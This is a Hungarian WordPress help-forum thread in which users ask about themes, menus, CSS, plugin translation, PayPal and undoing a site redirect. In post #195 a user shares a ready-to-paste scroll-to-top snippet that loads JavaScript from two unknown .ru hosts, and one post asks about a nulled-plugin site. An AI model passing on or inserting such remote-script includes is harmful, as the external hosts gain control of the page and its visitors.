Hirdetés

2024. április 20., szombat

Gyorskeresés

Téma összefoglaló

Téma összefoglaló

  • Utoljára frissítve: 2019-11-19 09:14:46

LOGOUT.hu

WordPress tartalom kezelő rendszer (CMS) topik

Összefoglaló kinyitása ▼

Hozzászólások

(#151) sz.j


sz.j
nagyúr

Szevasztok!

Tud valaki ajánlani egy nagyon részletesen beállítható/konfigurálható ingyenes responsive wp sablont?

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#152) The DJ válasza sz.j (#151) üzenetére


The DJ
addikt

Ingyenesek közül sajnos nehéz minőségit találni, ami jól is néz ki és a beállításai is érthetőek és kellően részletesek, de azért lehet próbálkozni: [link] vagy [link] esetleg [link]

De a "free responsive wordpress themes" kulcsszóra kiad még egy csomó egyéb gyűjteményt is.

Ha viszont nem sajnálsz rááldozni egy kis pénzt, akkor itt találod a legjobban dokumentált, legigényesebb és legjobb beállítási panelekkel rendelkező sablonokat: [link]

Innen most épp [EZZEL] dolgozom. Brutális mennyire részletes és mindenre kiterjedő beállítási lehetőségei vannak.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#153) sz.j válasza The DJ (#152) üzenetére


sz.j
nagyúr

Köszi a linkeket amik egy részét (sok-sok más mellett) már átnéztem ..., hogy őszinte legyek "belefáradtam" a keresésbe.
Nekem egy elegáns üzleti sablon kellene, de sajna eddig nem találtam olyant aminek szinte minden eleme jól állítható lenne.

Amit most Te használsz az tényleg nem rossz, de az én elképzeléseimbe (letisztult, elegáns, üzleti) úgy vélem nem illik bele.

[ Szerkesztve ]

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#154) The DJ válasza sz.j (#153) üzenetére


The DJ
addikt

Ez sajnos ilyen. Ha én sablont keresek, akkor meg se állok addig, amíg szembe nem jön az, amit megálmodtam. És van hogy ez napokig is eltart, méghozzá úgy, hogy közben semmi mást nem csinálok csak keresek. Elég kimerítő és monoton folyamat, de megéri.

Az ingyenes sablonokat azért is nem favorizálom annyira, mert bárhol szembetalálkozhatsz velük a neten. És nem csak te, hanem az ügyfeleid is. Ez pedig sokat levon a cég komolyságának értékéből. Ha tényleg fontos az igényes weboldal (márpedig miért ne lenne az) akkor én alapból a prémium sablonok környékén nézelődnék themeforest-en és kukáznám az összes ingyenes sablont. Nincs hozzájuk fejlesztői támogatás és sokszor rendes leírás sem, plusz az admin felületen beállítható dolgok száma is igen csekély legtöbb esetben. Ellenben a prémium sablonoknál szinte elveszel a beállítások tengerében és ha elakadsz akkor is segít a fejlesztő rögvest. Szerintem azt a pár dollárt ne sajnáld rá, főleg ha cégnek kell és nem személyes weboldalról beszélünk.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#155) Pikaa


Pikaa
aktív tag

Sziaztok!

A következő képet hol tudom lecserélni,módosítani?
kép

(#156) The DJ válasza Pikaa (#155) üzenetére


The DJ
addikt

Szinte biztos, hogy az éppen használt sablonod beállításainál le tudod cserélni az admin felületen keresztül, szóval csak kicsit kutakodnod kell.

De kézzel is megoldható, ebben az esetben készítened kell egy ugyanolyan méretű képet (418x90 pixel) és felülírni a wp-content/uploads/2013/09/sportbarat_logo_new__.png fájlt.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#157) Pikaa válasza The DJ (#156) üzenetére


Pikaa
aktív tag

:R :R

(#158) plaschil


plaschil
aktív tag

Sziasztok!

Valaki tud multilingual plugin-t WP-hez? A http://getnulledscripts.com/-ot ismeri valaki? Ott megtaláltam ezt. Ez nem fizetős? Mert máshol talán 80$-ért láttam. Nekem free kellene. Erről a getnulledscripts-ről tudtok valamit? Nem vírusos, káros dolgok vannak itt?

Creative G500 vezérlő panelt keresek// Hol vagy helyileg? - A kisszobába. // Szilvásbuktát, mert azt szeretem!

(#159) Stonerice


Stonerice
őstag

Nekem is lenne még egy kérdésem. A sablonomon, az eseménynaptárba, hogy kell felvenni eseményeket?
Bejegyzéseknél, kell valamit? Úgy érzem..

[ Szerkesztve ]

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#160) The DJ válasza plaschil (#158) üzenetére


The DJ
addikt

Ez kell neked: [link] Ingyenes, könnyen kezelhető, egyszerű, megbízható. Több oldalon is használtam már. A másik kérdésedre pedig az a válasz, hogy warez nem engedélyezett a fórumban, így ezt ne erőltessük ha lehet. :)

(#159) Stonerice: Milyen sablon? Milyen eseménynaptár plugin? Ha adsz linket vagy valami támpontot akkor segíteni is könnyebb lesz.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#161) Stonerice válasza The DJ (#160) üzenetére


Stonerice
őstag

A asablon neve, azthiszem Desire. nincs külön bővitmény az eseménynaptárhoz. Ez lenne a baj?

Oldal pedig . http://t7.hu/0z6i

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#162) The DJ válasza Stonerice (#161) üzenetére


The DJ
addikt

Ez nem eseménynaptár, hanem egy sima naptár nézetes archívum widget. Ez annyit csinál, hogy kattinthatóvá teszi azokat a napokat, amikor új posztot tettél ki az oldalra. Olyan, mint egy sima lenyílós archívum, ami az alap Wordpress sablonokban is van, csak ez kapott egy naptár nézetet.

Ha rendes eseménynaptár kell, akkor ahhoz bővítményeket kell vadásznod. Például: [link] vagy [link] esetleg [link]

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#163) plaschil válasza The DJ (#160) üzenetére


plaschil
aktív tag

Köszi! :)

Felraktam a kezdőlapra, de eleve van előtte egy felsorolás jel. Azt nem lehet leszedni? Továbbá nem tudom bárhová felrakni az oldalon? Úgy értem, hogy nem készíthetek egy widget-et pl a lap bal felső sarkába csak és kizárólag direkt ennek? Bocsi, de ez az első napom vele. Mármint a WP-vel. :)

[ Szerkesztve ]

Creative G500 vezérlő panelt keresek// Hol vagy helyileg? - A kisszobába. // Szilvásbuktát, mert azt szeretem!

(#164) The DJ válasza plaschil (#163) üzenetére


The DJ
addikt

A "felsorolás jel" valószínűleg a "list-style-type:disc;" CSS paraméter miatt van ott. Ennek az értékét kellene "none"-ra állítani és akkor eltűnne, de ha nem értesz a CSS-hez akkor ez kicsit mély víz lehet elsőre. De természetesen meg lehet oldani, hogy ezek szépen egymás mellett legyenek minden előjel nélkül, csak kell hozzá egy kis reszelés.

Pozicionálni is tudod természetesen. Ha van a sablonodban előre beállított widget terület a bal felső sarokban, akkor csak oda kell pakolnod a qtranslate widgetet, ha viszont nincs akkor két lehetőséged van. Vagy létre kell hoznod egy teljesen új, saját widget területet és azzal dolgozni vagy bepakolod oda, ahova tudod, aztán CSS-el eltolod a megfelelő helyre az egészet. Ez kicsit kókány módszer, de a célnak ez is megfelelhet.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#165) sz.j


sz.j
nagyúr

@ The DJ

Azt, hogy lehet megcsinálni, hogy ne (csak) a fejléc alatt (felett) legyen a menüsor, hanem az oldalsávban (pl. baloldalt)?

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#166) The DJ válasza sz.j (#165) üzenetére


The DJ
addikt

A legegyszerűbben talán bővítménnyel: [link]

Valójában ez egy widget, amit ha bepakolsz az oldalsávodba, akkor meg tudod vele jeleníteni a létrehozott menüpontokat vagy épp kategóriákat.

Ezt is megnézheted akár: [link]

Ezzel pedig bárhol (bejegyzés, oldal, widget, stb.) meg tudsz jeleníteni menüt shortcode-al: [link]

+1: [link] :)

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#167) Stonerice válasza The DJ (#162) üzenetére


Stonerice
őstag

Köszi, igazad van! :R
Remélem jól megélsz abból amit csinálsz, mert nagyon vágod ezt a Wordpress-es supportot.

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#168) sz.j válasza The DJ (#166) üzenetére


sz.j
nagyúr

Köszi az infót, átfogom nézni a linkeket és természetesen ki is fogom próbálni.

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#169) plaschil válasza The DJ (#164) üzenetére


plaschil
aktív tag

Köszi!

És hol érem el egy adott lap CSS-ét?
Pozicionálás: a sablonomban nincs ott ahová szeretném tenni, ezért inkább létrehoznék egyet. Ezt hogyan lehet? Pluginnal? Nincs erről egy videó esetleg valahol? Megkönnyíteni az életemet. :)

Creative G500 vezérlő panelt keresek// Hol vagy helyileg? - A kisszobába. // Szilvásbuktát, mert azt szeretem!

(#170) The DJ válasza plaschil (#169) üzenetére


The DJ
addikt

A témához tartozó CSS fájlt legtöbbször itt találod: /wp-content/themes/témádneve/style.css (esetleg alkalmanként külön mappába pakolják (pl: css vagy style)) Sokat segít a feladatban az is ha használsz valami code inspectort, pl: Firebugot Firefox mellé, így tudod mit kell módosítani és hanyadik sorban.

A widget létrehozása szintén nem kezdőknek való feladat, de annyira nem is bonyolult. Első lépésként a témád functions.php fájljában regisztrálni kell egy új widgetet, így meg is jelenik az admin felületen a többi mellett, aztán pedig meg kell mondani a témádnak, hogy az ebbe pakolt widgeteket hol is jelenítse meg a sablonon belül.

Itt egy leírás: [link]

A widget regisztrálása és megjelenítése után szükséged lehet még CSS módosításokra is hogy biztosan úgy nézzen ki ahogy szeretnéd.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#171) plaschil válasza The DJ (#170) üzenetére


plaschil
aktív tag

Megtaláltam, köszönöm!
Még egy kérdés, hogyan tudom szerkeszteni?
Van egy ilyen menüpontom, hogy: Appearance/Simple Custom CSS
Simple Custom CSS allows you to add your own styles or override the default CSS of a plugin or theme.
Ha ide bemásolom, azt amit elértem az általad említett linken, akkor onnan tudom módosítani, és ha update-elem azt, akkor meg is jelenik, nem?

Creative G500 vezérlő panelt keresek// Hol vagy helyileg? - A kisszobába. // Szilvásbuktát, mert azt szeretem!

(#172) The DJ válasza plaschil (#171) üzenetére


The DJ
addikt

Szerkeszteni úgy tudod, ha lemented FTP-n keresztül, módosítod, majd feltöltöd és felülírod a régit. Ez a hagyományos módszer. Aztán van a kényelmes megoldás, ami pedig annyit tesz, hogy a vezérlőpulton keresztül módosítod. Megjelenés / Szerkesztő (Appearance / Editor) és ott kiválasztod jobb oldalt a style.css fájlt és így weben keresztül tudod módosítani.

A harmadik megoldás az általad is említett út. Elég sok sablon támogatja a custom css kódok hozzáadását, ezek pedig felülírják és/vagy kiegészítik az eredeti CSS fájl tartalmát. Mindezt anélkül, hogy hozzá kellene nyúlni az eredeti fájlhoz. Nem tudom, hogy neked ezt most éppen plugin vagy a téma adta-e hozzá, de ez is megfelel. Viszont ebben az esetben ne másold be oda az egész CSS fájl tartalmát, mert egyrészt felesleges, másrészt meg zűröket okozhat. Csak keresd meg benne azt a részt, ami neked kell, másold be és módosítsd igény szerint.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#173) sz.j


sz.j
nagyúr

Biztos sokan furcsállni fogják a kérdésem, de mivel eddig nem volt rá szükségem nem foglalkoztam vele ....
Hogy kell/lehet sablont vásárolni a netten? (Kéretik nem röhögni. Köszönöm)

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#174) The DJ válasza sz.j (#173) üzenetére


The DJ
addikt

Nagyjából ugyanúgy, mint bármi mást, csak itt nem kell várni a szállításra, hanem fizetés után rögtön letöltheted a megvásárolt sablonod. Themeforest esetében ez annyi, hogy regisztrálsz, kiválasztod a sablont, rákattintasz a vásárlás gombra, fizetsz (általában PayPal-al) és már töltheted is le a csomagot. Ráadásul ha esetleg elveszítenéd vagy letörölnéd, akkor is bármikor újra elérhető marad a fiókodon keresztül és így a frissítéseket (és a supportot) is automatikusan megkapod hozzá.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#175) sz.j válasza The DJ (#174) üzenetére


sz.j
nagyúr

Mivel eddig nem volt PayPal-om (de még bankkártyám sem), ezért lenne egy-két technikai kérdésem.

1. PayPal-hoz kell anyagi fedezet, ezt hol kell (hol a legjobb) befizetni ?
2. Mindezt milyen pénznemben?
3. Ha forintban, akkor hogy történik az €-ra vagy $-ra történő átváltás?
4. Mennyire biztonságos ez a fizetési mód?

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#176) The DJ válasza sz.j (#175) üzenetére


The DJ
addikt

1. Ezt te döntöd el. Mindenképp össze kell kapcsolni a PayPal fiókod a bankszámláddal és a bankkártyáddal, de a regisztráció után te választod ki, hogy szeretnéd-e mindig kézzel feltölteni a PP egyenleged (top-up) vagy hogy a PP vegye-e le a kártyádról a pénzt vásárlás esetén ha nem lenne elegendő összeg a PP számlán. Én az utóbbit használom, mert kényelmesebb, mint mindig töltögetni.

2. Ezt is te döntöd el. Meghatározhatod mely pénznem legyen az elsődleges a PP számládon, de ettől eltekintve természetesen fogadhatsz/küldhetsz/tarthatsz más pénznemű összegeket is ugyanazon a számlán. Nálam előfordult, hogy egyszerre tároltam forintot, dollárt és eurót ugyanazon az accounton.

3. A PP aktuális árfolyama szerint történik mindig a váltás, de vásárláskor (fizetéskor) váltathatsz a bankoddal is, ha az kedvezőbb (legtöbbször kedvezőbb).

4. Teljesen. Magyarországon még sokan tartanak tőle és nem is annyira elterjedt, pedig hihetetlen mennyire megkönnyíti a netes vásárlást és hogy mennyire kényelmes tud lenni. Én ahol lehet PayPal-al fizetek már.

De ha elakadnál esetleg vagy mélyebben érdekel a dolog, akkor itt vannak a szakik, akik tudnak segíteni: [link]

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#177) sz.j válasza The DJ (#176) üzenetére


sz.j
nagyúr

Köszönöm a részletes válaszaidat. :K

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#178) Stonerice


Stonerice
őstag

Felraktam ezt a The Events Calendar bővítményt, és nem tudom hogy lehetne magyarítani. de ha pá szót letudnék fordítani a fájlokban, már azis elég lenne. Utóbbival az a baj, nemtudom, hol kell.

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#179) The DJ válasza Stonerice (#178) üzenetére


The DJ
addikt

Gyönyörűen és könnyedén le tudsz fordítani bármit a vezérlőpulton keresztül a Codestyling Localization plugin segítségével: [link]

Nem bonyolult a kezelése, de ha nem volna valami egyértelmű, akkor írj és segítek.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#180) Stonerice válasza The DJ (#179) üzenetére


Stonerice
őstag

Mik vannak? Még erre is van bővítmény :D. Köszi! :R
Nézek előbb róla videót este, hogy bonyolult-e számomra.

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#181) sz.j


sz.j
nagyúr

Srácok!
Azt, hogy lehet megcsinálni, hogy az almenüre (címre) kattintva egy pdf fájl rögtön megnyíljon (tehát ne egy aloldal ahol egy link van) ?

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#182) Stonerice válasza The DJ (#179) üzenetére


Stonerice
őstag

Nem akar összejönni, a fordítás. Nem találja azt a szót, ami a weblapon megjelenik.
Felraktam a bővítméyt amit mondtál, de az eseménynaptárnak , csak a bővítményen beluli szavait ajánlja fel a keresőben, fordításra.

[ Szerkesztve ]

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#183) The DJ válasza sz.j (#181) üzenetére


The DJ
addikt

Feltételezem, hogy létrehoztál egy menüt a Megjelenés / Menü (Appearance / Menu) résznél. Ott ugye hozzáadhatsz oldalakat, kategóriákat és egyedi URL-t is menüpontként. Ez utóbbira van neked szükséged.

Tehát összepakolod a menüpontjaid, szükség szerint almenükkel és azt a menüpontot, ahova a PDF dokumentumot szánod linkként (URL-ként) adod hozzá és a hozzáadás előtt az URL részhez bemásolod a PDF dokumentum linkjét. (Persze feltételeztem, hogy a PDF dokumentumot már korábban hozzáadtad a médiatárhoz és kimásoltad a hozzá vezető direkt linket.) Aztán elmented a menüdet és így ha valaki arra a menüpontra kattint akkor rögtön a PDF dokumentum fog megnyílni vagy letöltődni.

Itt a custom links rész kell neked: [link]

(#182) Stonerice: Melyik az a szó amit nem talál a fordító? Mert előfordulhat, hogy bizonyos szavak átírásához magát a bővítményt kell módosítani.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#184) Stonerice válasza The DJ (#183) üzenetére


Stonerice
őstag

Bővitményt jelöltem ki fordításra, vagyis a The Events Calendar v3.2-t. de nem találja a kereső, a Events in, View All Events kifejezést.. például. Csak azokat amiket vezérlőpultban látok a bővítmény( The Events..) beállításaiban.

Ja, azthiszem oké :DD nagy betüvel kelett írni a szavak első betűjét :DD :P

Köszi :R

[ Szerkesztve ]

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#185) sz.j válasza The DJ (#183) üzenetére


sz.j
nagyúr

Köszi, köszi.

Majd "kiütötte a szememet" mégsem vettem észre ezt a lehetőséget ..... :B

Műanyag, alumínium és motoros redőnyök, valamint szúnyoghálók készítése, szerelése. www.szaboredony.hu

(#186) Pikaa


Pikaa
aktív tag

@The DJ: Ebben tudnál segíteni?

Ezt szeretném kijavítani magyarra: kép

[ Szerkesztve ]

(#187) Stonerice válasza Pikaa (#186) üzenetére


Stonerice
őstag

Úgy tudod megoldani, ahogy nekem is tanácsolt egy bővítményt erre a célra. #179-es hsz. A bővítmény nevét beírod a youtub-on, és fogod látni, hogyan is kell honosítain. Lényeg, hogy ami nagy betüvel kezdődik, úgy is kell beírni a keresőjébe!

[ Szerkesztve ]

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#188) The DJ válasza Pikaa (#186) üzenetére


The DJ
addikt

Stonerice tanácsa nem rossz, sőt. Ha azok egy plugin gombjai akkor lehet honosítani nagy valószínűséggel a korábban linkelt bővítménnyel, ha viszont a sablon maradványai, akkor magát a sablon PHP fájljait kell módosítani hozzá.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#189) Pikaa válasza The DJ (#188) üzenetére


Pikaa
aktív tag

Letöltöttem a plugint és átírtam,majd rákattantam a mo fájl készítésére,ahogy a videó is mutatta.

De semmi,minden a régi. kép

[ Szerkesztve ]

(#190) Stonerice válasza Pikaa (#189) üzenetére


Stonerice
őstag

Nálam is úgy maradt a böngésző hibájából, de a képed azt mutatja, hogy módosítva van.
Én mikor ellenőriztem a weboldalt egy másik gépen, is ami cookie-ban is benne volt, illetve könyvjelzőben is, ezért a tárolt változatát töltötte be a weboldalnak. Ráfrissítettem, és nálam utána már magyarult jelent meg a módosított elem.

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#191) Pikaa válasza Stonerice (#190) üzenetére


Pikaa
aktív tag

Nézd meg akkor megkérlek,hogy neked most hogy mutatja. [link]

[ Szerkesztve ]

(#192) independence


independence
csendes tag

Sziasztok!

Volna egy kérdésem, remélem tudtok segíteni mert SOS lenne.
Adott egy weboldal, amit ha beírsz az URL-be akkor át lett irányítva máshova.
Ezt az átirányítást hogyan lehet visszacsinálni?
Ha a régi oldal wp-adminnal próbálok belépni, azt is átirányítja az új oldalra, szóval webről nem tudok belépni a régi oldalra.
Kérlek titeket aki tud, segítsen:)
Előre is köszönöm.

Üdv:
Dávid

(#193) Pikaa


Pikaa
aktív tag

A másik dolgot hanyagolom,sok mindent elálított angolra,így töröltem a bővítményt.

Most szeretnék egy ilyet,a lap tetejére gomb féleséget :) kép

(#194) Pikaa válasza Pikaa (#193) üzenetére


Pikaa
aktív tag

(#195) Pikaa válasza Pikaa (#193) üzenetére


Pikaa
aktív tag

Sikerült egyet kapnom,akinek még kellene,itt van:

<SCRIPT src="http://bambun.ru/css_js/strelka_exe.js" type="text/javascript" language="javascript"></SCRIPT>
<a id="gotop" class="scrollTop" href="#" onclick="top.goTop(); return false;" style="text-align: justify;"><script src="http://xall-pc.ru/up.js" type="text/javascript"></script></a>
<style type="text/css">
.scrollTop{
background:url(http://bambun.ru/images/up.png) 0 0 no-repeat;
display:block; width:32px; height:32px;
position:fixed; bottom:20px; right:1%;
z-index:2000;
}
.scrollTop:hover{ background-position:0 -58px; }
</style>

(#196) The DJ válasza independence (#192) üzenetére


The DJ
addikt

Milyen módon történt az átirányítás? Ha .htaccess segítségével akkor ideiglenesen töröld vagy nevezd át a .htaccess fájlt a weboldalad gyökeréből és akkor rögtön nem is fog átdobni sehova.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#197) independence válasza The DJ (#196) üzenetére


independence
csendes tag

A kezelőfelületen a Settings - General Settingsbe lett átírva a "wordpress address" és a "site address" is.
Ezt a kettőt kéne vissza javítanom valahogyan.
Erre gondoltál Te is?

[ Szerkesztve ]

(#198) The DJ válasza independence (#197) üzenetére


The DJ
addikt

Ehhez adatbázisban kell(ene) turkálni, de elsőként próbáld meg hozzáadni a következőt a wp-config.php fájlodhoz:

define('WP_HOME','http://domained.hu');
define('WP_SITEURL','http://domained.hu');

Értelemszerűen a domained.hu helyett az eredeti domain nevét írd.

https://wpszaki.hu - Minden, ami WordPress, cikkek kezdőknek és haladóknak.

(#199) Stonerice válasza Pikaa (#191) üzenetére


Stonerice
őstag

Nekem is angolt mutat :(
Nagyonszép az oldalad :C . Van érzéked a dizájnhoz. Meg gondolom kicsit régebb óta ismered a Wordpress-t mint én.

[ Szerkesztve ]

Pénz beszél, kutya utal! Aktuális főkomponenseim: 5600X / Msi B450 Gaming Plus Max / 16GB 3733 cl16 / Sapphire Nitro Rx480

(#200) Pikaa válasza Stonerice (#199) üzenetére


Pikaa
aktív tag

Letöröltem ugy-e,s gondoltam visszaáll az alapbeállításra,de b@szott rá visszaállni. Most meg fele water,fele víz :))

Copyright © 2000-2024 PROHARDVER Informatikai Kft.